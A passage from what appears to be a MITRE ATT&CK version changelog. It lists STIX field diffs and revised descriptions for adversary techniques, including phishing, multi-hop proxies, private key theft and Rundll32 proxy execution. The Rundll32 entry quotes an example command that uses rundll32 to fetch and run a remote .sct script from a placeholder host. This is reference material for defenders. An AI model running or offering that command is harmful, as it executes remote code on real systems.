| | | riented infrastructure to implement routing between a decent |
| | | ralized network of peers.(Citation: NGLite Trojan) |
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2024-04-19 13:24:36.872000+00:00 | 2024-09-25 20:48:24.411000+00:00 |
description | Adversaries may chain together multiple proxies to disguise the source of malicious traffic. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source.
For example, adversaries may construct or use onion routing networks – such as the publicly available [Tor](https://attack.mitre.org/software/S0183) network – to transport encrypted C2 traffic through a compromised population, allowing communication with any device within the network.(Citation: Onion Routing)
In the case of network infrastructure, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)). By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001) on routers, adversaries can add custom code to the affected network devices that will implement onion routing between those nodes. This method is dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method allowing the adversaries to cross the protected network boundary of the Internet perimeter and into the organization’s Wide-Area Network (WAN). Protocols such as ICMP may be used as a transport.
Similarly, adversaries may abuse peer-to-peer (P2P) and blockchain-oriented infrastructure to implement routing between a decentralized network of peers.(Citation: NGLite Trojan) | Adversaries may chain together multiple proxies to disguise the source of malicious traffic. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source.
For example, adversaries may construct or use onion routing networks – such as the publicly available [Tor](https://attack.mitre.org/software/S0183) network – to transport encrypted C2 traffic through a compromised population, allowing communication with any device within the network.(Citation: Onion Routing) Adversaries may also use operational relay box (ORB) networks composed of virtual private servers (VPS), Internet of Things (IoT) devices, smart devices, and end-of-life routers to obfuscate their operations. (Citation: ORB Mandiant)
In the case of network infrastructure, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)). By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001) on routers, adversaries can add custom code to the affected network devices that will implement onion routing between those nodes. This method is dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method allowing the adversaries to cross the protected network boundary of the Internet perimeter and into the organization’s Wide-Area Network (WAN). Protocols such as ICMP may be used as a transport.
Similarly, adversaries may abuse peer-to-peer (P2P) and blockchain-oriented infrastructure to implement routing between a decentralized network of peers.(Citation: NGLite Trojan) |
x_mitre_version | 2.1 | 2.2 |
iterable_item_addedSTIX Field | Old value | New Value |
---|
external_references | | {'source_name': 'ORB Mandiant', 'description': 'Raggi, Michael. (2024, May 22). IOC Extinction? China-Nexus Cyber Espionage Actors Use ORB Networks to Raise Cost on Defenders. Retrieved July 8, 2024.', 'url': 'https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-orb-networks'} |
[T1498] Network Denial of Service
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2022-03-25 20:05:40.122000+00:00 | 2024-10-15 16:01:00.510000+00:00 |
external_references[2]['description'] | FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals Targeting Financial Institution Employee Credentials to Conduct Wire Transfer Fraud. Retrieved April 18, 2019. | FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals Targeting Financial Institution Employee Credentials to Conduct Wire Transfer Fraud. Retrieved September 23, 2024. |
external_references[2]['url'] | https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf | https://www.ic3.gov/Media/PDF/Y2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf |
x_mitre_version | 1.1 | 1.2 |
iterable_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | Azure AD | |
x_mitre_platforms | Office 365 | |
x_mitre_platforms | SaaS | |
x_mitre_platforms | Google Workspace | |
[T1137] Office Application Startup
Current version: 1.4
Version changed from: 1.3 → 1.4
Details
dictionary_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
dictionary_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_permissions_required | ['User', 'Administrator'] | |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2021-10-15 20:18:31.112000+00:00 | 2024-10-15 16:01:21.255000+00:00 |
x_mitre_version | 1.3 | 1.4 |
x_mitre_platforms[1] | Office 365 | Office Suite |
[T1137.001] Office Application Startup: Office Template Macros
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
dictionary_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_permissions_required | ['User', 'Administrator'] | |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2021-08-16 21:27:10.873000+00:00 | 2024-10-15 16:01:35.918000+00:00 |
x_mitre_version | 1.1 | 1.2 |
x_mitre_platforms[1] | Office 365 | Office Suite |
[T1137.002] Office Application Startup: Office Test
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2024-04-16 12:41:55.175000+00:00 | 2024-10-15 16:01:48.325000+00:00 |
x_mitre_version | 1.2 | 1.3 |
x_mitre_platforms[1] | Office 365 | Office Suite |
[T1137.003] Office Application Startup: Outlook Forms
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
dictionary_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_permissions_required | ['Administrator', 'User'] | |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2021-08-16 21:29:19.697000+00:00 | 2024-10-15 16:02:00.782000+00:00 |
x_mitre_version | 1.1 | 1.2 |
x_mitre_platforms[1] | Office 365 | Office Suite |
[T1137.004] Office Application Startup: Outlook Home Page
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
dictionary_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_permissions_required | ['Administrator', 'User'] | |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2021-08-16 21:30:01.743000+00:00 | 2024-10-15 16:02:13.742000+00:00 |
x_mitre_version | 1.1 | 1.2 |
x_mitre_platforms[1] | Office 365 | Office Suite |
[T1137.005] Office Application Startup: Outlook Rules
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
dictionary_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_permissions_required | ['Administrator', 'User'] | |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2021-10-15 20:18:30.700000+00:00 | 2024-10-15 16:02:26.206000+00:00 |
x_mitre_version | 1.1 | 1.2 |
x_mitre_platforms[1] | Office 365 | Office Suite |
[T1110.002] Brute Force: Password Cracking
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2023-03-30 21:01:48.643000+00:00 | 2024-10-14 22:11:30.271000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
x_mitre_version | 1.2 | 1.3 |
x_mitre_platforms[4] | Azure AD | Office Suite |
iterable_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | | Identity Provider |
iterable_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | Office 365 | |
[T1556.002] Modify Authentication Process: Password Filter DLL
Current version: 2.1
Version changed from: 2.0 → 2.1
Details
dictionary_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
dictionary_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_permissions_required | ['Administrator', 'SYSTEM'] | |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2021-04-20 20:11:55.147000+00:00 | 2024-08-21 16:16:18.271000+00:00 |
x_mitre_version | 2.0 | 2.1 |
[T1110.001] Brute Force: Password Guessing
Current version: 1.6
Version changed from: 1.5 → 1.6
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2023-10-16 16:57:41.743000+00:00 | 2024-10-14 22:11:30.271000+00:00 |
x_mitre_version | 1.5 | 1.6 |
x_mitre_platforms[7] | Google Workspace | Office Suite |
iterable_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | | Identity Provider |
iterable_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | Azure AD | |
x_mitre_platforms | Office 365 | |
[T1555.005] Credentials from Password Stores: Password Managers
Current version: 1.1
Version changed from: 1.0 → 1.1
New Mitigations:
- M1017: User Training
- M1018: User Account Management
Details
dictionary_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
dictionary_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_permissions_required | ['User'] | |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2022-03-25 13:18:55.310000+00:00 | 2024-08-19 13:53:33.661000+00:00 |
x_mitre_version | 1.0 | 1.1 |
[T1201] Password Policy Discovery
Current version: 1.6
Version changed from: 1.5 → 1.6
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2022-09-06 22:01:45.067000+00:00 | 2024-10-15 16:02:44.477000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
x_mitre_version | 1.5 | 1.6 |
iterable_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | | Identity Provider |
x_mitre_platforms | | SaaS |
x_mitre_platforms | | Office Suite |
[T1110.003] Brute Force: Password Spraying
Current version: 1.6
Version changed from: 1.5 → 1.6
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2024-03-07 14:33:34.201000+00:00 | 2024-10-14 22:11:30.271000+00:00 |
x_mitre_version | 1.5 | 1.6 |
x_mitre_platforms[7] | Google Workspace | Office Suite |
iterable_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | | Identity Provider |
iterable_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | Azure AD | |
x_mitre_platforms | Office 365 | |
[T1069] Permission Groups Discovery
Current version: 2.6
Version changed from: 2.5 → 2.6
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2023-04-15 17:26:53.365000+00:00 | 2024-10-15 16:03:06.294000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 2.5 | 2.6 |
x_mitre_platforms[7] | Google Workspace | Identity Provider |
iterable_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | | Office Suite |
iterable_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | Azure AD | |
x_mitre_platforms | Office 365 | |
[T1566] Phishing
Current version: 2.6
Version changed from: 2.5 → 2.6
|
|
t | Adversaries may send phishing messages to gain access to vic | t | Adversaries may send phishing messages to gain access to vic |
| tim systems. All forms of phishing are electronically delive | | tim systems. All forms of phishing are electronically delive |
| red social engineering. Phishing can be targeted, known as s | | red social engineering. Phishing can be targeted, known as s |
| pearphishing. In spearphishing, a specific individual, compa | | pearphishing. In spearphishing, a specific individual, compa |
| ny, or industry will be targeted by the adversary. More gene | | ny, or industry will be targeted by the adversary. More gene |
| rally, adversaries can conduct non-targeted phishing, such a | | rally, adversaries can conduct non-targeted phishing, such a |
| s in mass malware spam campaigns. Adversaries may send vict | | s in mass malware spam campaigns. Adversaries may send vict |
| ims emails containing malicious attachments or links, typica | | ims emails containing malicious attachments or links, typica |
| lly to execute malicious code on victim systems. Phishing ma | | lly to execute malicious code on victim systems. Phishing ma |
| y also be conducted via third-party services, like social me | | y also be conducted via third-party services, like social me |
| dia platforms. Phishing may also involve social engineering | | dia platforms. Phishing may also involve social engineering |
| techniques, such as posing as a trusted source, as well as e | | techniques, such as posing as a trusted source, as well as e |
| vasive techniques such as removing or manipulating emails or | | vasive techniques such as removing or manipulating emails or |
| metadata/headers from compromised accounts being abused to | | metadata/headers from compromised accounts being abused to |
| send messages (e.g., [Email Hiding Rules](https://attack.mit | | send messages (e.g., [Email Hiding Rules](https://attack.mit |
| re.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spa | | re.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spa |
| m 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014) An | | m 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014) An |
| other way to accomplish this is by forging or spoofing(Citat | | other way to accomplish this is by forging or spoofing(Citat |
| ion: Proofpoint-spoof) the identity of the sender which can | | ion: Proofpoint-spoof) the identity of the sender which can |
| be used to fool both the human recipient as well as automate | | be used to fool both the human recipient as well as automate |
| d security tools.(Citation: cyberproof-double-bounce) Vict | | d security tools,(Citation: cyberproof-double-bounce) or by |
| ims may also receive phishing messages that instruct them to | | including the intended target as a party to an existing emai |
| call a phone number where they are directed to visit a mali | | l thread that includes malicious files or links (i.e., "thre |
| cious URL, download malware,(Citation: sygnia Luna Month)(Ci | | ad hijacking").(Citation: phishing-krebs) Victims may also |
| tation: CISA Remote Monitoring and Management Software) or i | | receive phishing messages that instruct them to call a phone |
| nstall adversary-accessible remote management tools onto the | | number where they are directed to visit a malicious URL, do |
| ir computer (i.e., [User Execution](https://attack.mitre.org | | wnload malware,(Citation: sygnia Luna Month)(Citation: CISA |
| /techniques/T1204)).(Citation: Unit42 Luna Moth) | | Remote Monitoring and Management Software) or install advers |
| | | ary-accessible remote management tools onto their computer ( |
| | | i.e., [User Execution](https://attack.mitre.org/techniques/T |
| | | 1204)).(Citation: Unit42 Luna Moth) |
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2024-03-01 16:56:32.245000+00:00 | 2024-10-07 15:00:19.668000+00:00 |
description | Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.
Adversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source, as well as evasive techniques such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014) Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof) the identity of the sender which can be used to fool both the human recipient as well as automated security tools.(Citation: cyberproof-double-bounce)
Victims may also receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,(Citation: sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software) or install adversary-accessible remote management tools onto their computer (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: Unit42 Luna Moth) | Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.
Adversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source, as well as evasive techniques such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014) Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof) the identity of the sender which can be used to fool both the human recipient as well as automated security tools,(Citation: cyberproof-double-bounce) or by including the intended target as a party to an existing email thread that includes malicious files or links (i.e., "thread hijacking").(Citation: phishing-krebs)
Victims may also receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,(Citation: sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software) or install adversary-accessible remote management tools onto their computer (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: Unit42 Luna Moth) |
external_references[1]['url'] | https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf | https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf |
x_mitre_version | 2.5 | 2.6 |
x_mitre_platforms[4] | Office 365 | Identity Provider |
x_mitre_platforms[5] | Google Workspace | Office Suite |
iterable_item_addedSTIX Field | Old value | New Value |
---|
external_references | | {'source_name': 'phishing-krebs', 'description': 'Brian Krebs. (2024, March 28). Thread Hijacking: Phishes That Prey on Your Curiosity. Retrieved September 27, 2024.', 'url': 'https://krebsonsecurity.com/2024/03/thread-hijacking-phishes-that-prey-on-your-curiosity/'} |
[T1556.003] Modify Authentication Process: Pluggable Authentication Modules
Current version: 2.1
Version changed from: 2.0 → 2.1
Details
dictionary_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
dictionary_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_permissions_required | ['root'] | |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2021-10-17 14:48:33.580000+00:00 | 2024-08-21 16:19:55.082000+00:00 |
x_mitre_version | 2.0 | 2.1 |
[T1552.004] Unsecured Credentials: Private Keys
Current version: 1.2
Version changed from: 1.1 → 1.2
|
|
t | Adversaries may search for private key certificate files on | t | Adversaries may search for private key certificate files on |
| compromised systems for insecurely stored credentials. Priva | | compromised systems for insecurely stored credentials. Priva |
| te cryptographic keys and certificates are used for authenti | | te cryptographic keys and certificates are used for authenti |
| cation, encryption/decryption, and digital signatures.(Citat | | cation, encryption/decryption, and digital signatures.(Citat |
| ion: Wikipedia Public Key Crypto) Common key and certificate | | ion: Wikipedia Public Key Crypto) Common key and certificate |
| file extensions include: .key, .pgp, .gpg, .ppk., .p12, .pe | | file extensions include: .key, .pgp, .gpg, .ppk., .p12, .pe |
| m, .pfx, .cer, .p7b, .asc. Adversaries may also look in co | | m, .pfx, .cer, .p7b, .asc. Adversaries may also look in co |
| mmon key directories, such as <code>~/.ssh</code> for SSH ke | | mmon key directories, such as <code>~/.ssh</code> for SSH ke |
| ys on * nix-based systems or <code>C:\Users\(usernam | | ys on * nix-based systems or <code>C:\Users\(usernam |
| e)\.ssh\</code> on Windows. Adversary tools may also | | e)\.ssh\</code> on Windows. Adversary tools may also |
| search compromised systems for file extensions relating to | | search compromised systems for file extensions relating to |
| cryptographic keys and certificates.(Citation: Kaspersky Car | | cryptographic keys and certificates.(Citation: Kaspersky Car |
| eto)(Citation: Palo Alto Prince of Persia) When a device is | | eto)(Citation: Palo Alto Prince of Persia) When a device is |
| registered to Azure AD, a device key and a transport key ar | | registered to Entra ID, a device key and a transport key ar |
| e generated and used to verify the device’s identity.(Citati | | e generated and used to verify the device’s identity.(Citati |
| on: Microsoft Primary Refresh Token) An adversary with acces | | on: Microsoft Primary Refresh Token) An adversary with acces |
| s to the device may be able to export the keys in order to i | | s to the device may be able to export the keys in order to i |
| mpersonate the device.(Citation: AADInternals Azure AD Devic | | mpersonate the device.(Citation: AADInternals Azure AD Devic |
| e Identities) On network devices, private keys may be expor | | e Identities) On network devices, private keys may be expor |
| ted via [Network Device CLI](https://attack.mitre.org/techni | | ted via [Network Device CLI](https://attack.mitre.org/techni |
| ques/T1059/008) commands such as `crypto pki export`.(Citati | | ques/T1059/008) commands such as `crypto pki export`.(Citati |
| on: cisco_deploy_rsa_keys) Some private keys require a pas | | on: cisco_deploy_rsa_keys) Some private keys require a pas |
| sword or passphrase for operation, so an adversary may also | | sword or passphrase for operation, so an adversary may also |
| use [Input Capture](https://attack.mitre.org/techniques/T105 | | use [Input Capture](https://attack.mitre.org/techniques/T105 |
| 6) for keylogging or attempt to [Brute Force](https://attack | | 6) for keylogging or attempt to [Brute Force](https://attack |
| .mitre.org/techniques/T1110) the passphrase off-line. These | | .mitre.org/techniques/T1110) the passphrase off-line. These |
| private keys can be used to authenticate to [Remote Services | | private keys can be used to authenticate to [Remote Services |
| ](https://attack.mitre.org/techniques/T1021) like SSH or for | | ](https://attack.mitre.org/techniques/T1021) like SSH or for |
| use in decrypting other collected files such as email. | | use in decrypting other collected files such as email. |
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2023-04-12 23:52:08.194000+00:00 | 2024-10-04 11:31:56.622000+00:00 |
description | Adversaries may search for private key certificate files on compromised systems for insecurely stored credentials. Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures.(Citation: Wikipedia Public Key Crypto) Common key and certificate file extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, .pfx, .cer, .p7b, .asc.
Adversaries may also look in common key directories, such as ~/.ssh for SSH keys on * nix-based systems or C:\Users\(username)\.ssh\ on Windows. Adversary tools may also search compromised systems for file extensions relating to cryptographic keys and certificates.(Citation: Kaspersky Careto)(Citation: Palo Alto Prince of Persia)
When a device is registered to Azure AD, a device key and a transport key are generated and used to verify the device’s identity.(Citation: Microsoft Primary Refresh Token) An adversary with access to the device may be able to export the keys in order to impersonate the device.(Citation: AADInternals Azure AD Device Identities)
On network devices, private keys may be exported via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `crypto pki export`.(Citation: cisco_deploy_rsa_keys)
Some private keys require a password or passphrase for operation, so an adversary may also use [Input Capture](https://attack.mitre.org/techniques/T1056) for keylogging or attempt to [Brute Force](https://attack.mitre.org/techniques/T1110) the passphrase off-line. These private keys can be used to authenticate to [Remote Services](https://attack.mitre.org/techniques/T1021) like SSH or for use in decrypting other collected files such as email. | Adversaries may search for private key certificate files on compromised systems for insecurely stored credentials. Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures.(Citation: Wikipedia Public Key Crypto) Common key and certificate file extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, .pfx, .cer, .p7b, .asc.
Adversaries may also look in common key directories, such as ~/.ssh for SSH keys on * nix-based systems or C:\Users\(username)\.ssh\ on Windows. Adversary tools may also search compromised systems for file extensions relating to cryptographic keys and certificates.(Citation: Kaspersky Careto)(Citation: Palo Alto Prince of Persia)
When a device is registered to Entra ID, a device key and a transport key are generated and used to verify the device’s identity.(Citation: Microsoft Primary Refresh Token) An adversary with access to the device may be able to export the keys in order to impersonate the device.(Citation: AADInternals Azure AD Device Identities)
On network devices, private keys may be exported via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `crypto pki export`.(Citation: cisco_deploy_rsa_keys)
Some private keys require a password or passphrase for operation, so an adversary may also use [Input Capture](https://attack.mitre.org/techniques/T1056) for keylogging or attempt to [Brute Force](https://attack.mitre.org/techniques/T1110) the passphrase off-line. These private keys can be used to authenticate to [Remote Services](https://attack.mitre.org/techniques/T1021) like SSH or for use in decrypting other collected files such as email. |
external_references[4]['url'] | https://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf | https://web.archive.org/web/20141031134104/http://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.1 | 1.2 |
[T1498.002] Network Denial of Service: Reflection Amplification
Current version: 1.4
Version changed from: 1.3 → 1.4
Details
dictionary_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_deprecated | | False |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2023-03-30 21:01:41.052000+00:00 | 2024-10-15 16:04:34.495000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.3 | 1.4 |
iterable_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | Azure AD | |
x_mitre_platforms | Office 365 | |
x_mitre_platforms | SaaS | |
x_mitre_platforms | Google Workspace | |
[T1114.002] Email Collection: Remote Email Collection
Current version: 1.3
Version changed from: 1.2 → 1.3
New Mitigations:
- M1060: Out-of-Band Communications Channel
Details
dictionary_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_contributors | | ['Arun Seelagan, CISA'] |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2023-05-31 12:34:03.420000+00:00 | 2024-10-14 22:11:30.271000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.2 | 1.3 |
iterable_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | | Office Suite |
iterable_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | Office 365 | |
x_mitre_platforms | Google Workspace | |
[T1556.005] Modify Authentication Process: Reversible Encryption
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
dictionary_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_permissions_required | ['User', 'Administrator'] | |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2022-02-10 21:35:25.377000+00:00 | 2024-08-26 15:40:31.871000+00:00 |
x_mitre_version | 1.0 | 1.1 |
[T1218.011] System Binary Proxy Execution: Rundll32
Current version: 2.3
Version changed from: 2.2 → 2.3
|
|
t | Adversaries may abuse rundll32.exe to proxy execution of mal | t | Adversaries may abuse rundll32.exe to proxy execution of mal |
| icious code. Using rundll32.exe, vice executing directly (i. | | icious code. Using rundll32.exe, vice executing directly (i. |
| e. [Shared Modules](https://attack.mitre.org/techniques/T112 | | e. [Shared Modules](https://attack.mitre.org/techniques/T112 |
| 9)), may avoid triggering security tools that may not monito | | 9)), may avoid triggering security tools that may not monito |
| r execution of the rundll32.exe process because of allowlist | | r execution of the rundll32.exe process because of allowlist |
| s or false positives from normal operations. Rundll32.exe is | | s or false positives from normal operations. Rundll32.exe is |
| commonly associated with executing DLL payloads (ex: <code> | | commonly associated with executing DLL payloads (ex: <code> |
| rundll32.exe {DLLname, DLLfunction}</code>). Rundll32.exe c | | rundll32.exe {DLLname, DLLfunction}</code>). Rundll32.exe c |
| an also be used to execute [Control Panel](https://attack.mi | | an also be used to execute [Control Panel](https://attack.mi |
| tre.org/techniques/T1218/002) Item files (.cpl) through the | | tre.org/techniques/T1218/002) Item files (.cpl) through the |
| undocumented shell32.dll functions <code>Control_RunDLL</cod | | undocumented shell32.dll functions <code>Control_RunDLL</cod |
| e> and <code>Control_RunDLLAsUser</code>. Double-clicking a | | e> and <code>Control_RunDLLAsUser</code>. Double-clicking a |
| .cpl file also causes rundll32.exe to execute. (Citation: Tr | | .cpl file also causes rundll32.exe to execute.(Citation: Tre |
| end Micro CPL) Rundll32 can also be used to execute scripts | | nd Micro CPL) For example, [ClickOnce](https://attack.mitre. |
| such as JavaScript. This can be done using a syntax similar | | org/techniques/T1127/002) can be proxied through Rundll32.ex |
| to this: <code>rundll32.exe javascript:"\..\mshtml,RunHTMLA | | e. Rundll32 can also be used to execute scripts such as Jav |
| pplication ";document.write();GetObject("script:https[:]//ww | | aScript. This can be done using a syntax similar to this: <c |
| w[.]example[.]com/malicious.sct")"</code> This behavior has | | ode>rundll32.exe javascript:"\..\mshtml,RunHTMLApplication " |
| been seen used by malware such as Poweliks. (Citation: This | | ;document.write();GetObject("script:https[:]//www[.]example[ |
| is Security Command Line Confusion) Adversaries may also a | | .]com/malicious.sct")"</code> This behavior has been seen u |
| ttempt to obscure malicious code from analysis by abusing th | | sed by malware such as Poweliks. (Citation: This is Security |
| e manner in which rundll32.exe loads DLL function names. As | | Command Line Confusion) Adversaries may also attempt to ob |
| part of Windows compatibility support for various character | | scure malicious code from analysis by abusing the manner in |
| sets, rundll32.exe will first check for wide/Unicode then AN | | which rundll32.exe loads DLL function names. As part of Wind |
| SI character-supported functions before loading the specifie | | ows compatibility support for various character sets, rundll |
| d function (e.g., given the command <code>rundll32.exe Examp | | 32.exe will first check for wide/Unicode then ANSI character |
| leDLL.dll, ExampleFunction</code>, rundll32.exe would first | | -supported functions before loading the specified function ( |
| attempt to execute <code>ExampleFunctionW</code>, or failing | | e.g., given the command <code>rundll32.exe ExampleDLL.dll, E |
| that <code>ExampleFunctionA</code>, before loading <code>Ex | | xampleFunction</code>, rundll32.exe would first attempt to e |
| ampleFunction</code>). Adversaries may therefore obscure mal | | xecute <code>ExampleFunctionW</code>, or failing that <code> |
| icious code by creating multiple identical exported function | | ExampleFunctionA</code>, before loading <code>ExampleFunctio |
| names and appending <code>W</code> and/or <code>A</code> to | | n</code>). Adversaries may therefore obscure malicious code |
| harmless ones.(Citation: Attackify Rundll32.exe Obscurity)( | | by creating multiple identical exported function names and a |
| Citation: Github NoRunDll) DLL functions can also be exporte | | ppending <code>W</code> and/or <code>A</code> to harmless on |
| d and executed by an ordinal number (ex: <code>rundll32.exe | | es.(Citation: Attackify Rundll32.exe Obscurity)(Citation: Gi |
| file.dll,#1</code>). Additionally, adversaries may use [Mas | | thub NoRunDll) DLL functions can also be exported and execut |
| querading](https://attack.mitre.org/techniques/T1036) techni | | ed by an ordinal number (ex: <code>rundll32.exe file.dll,#1< |
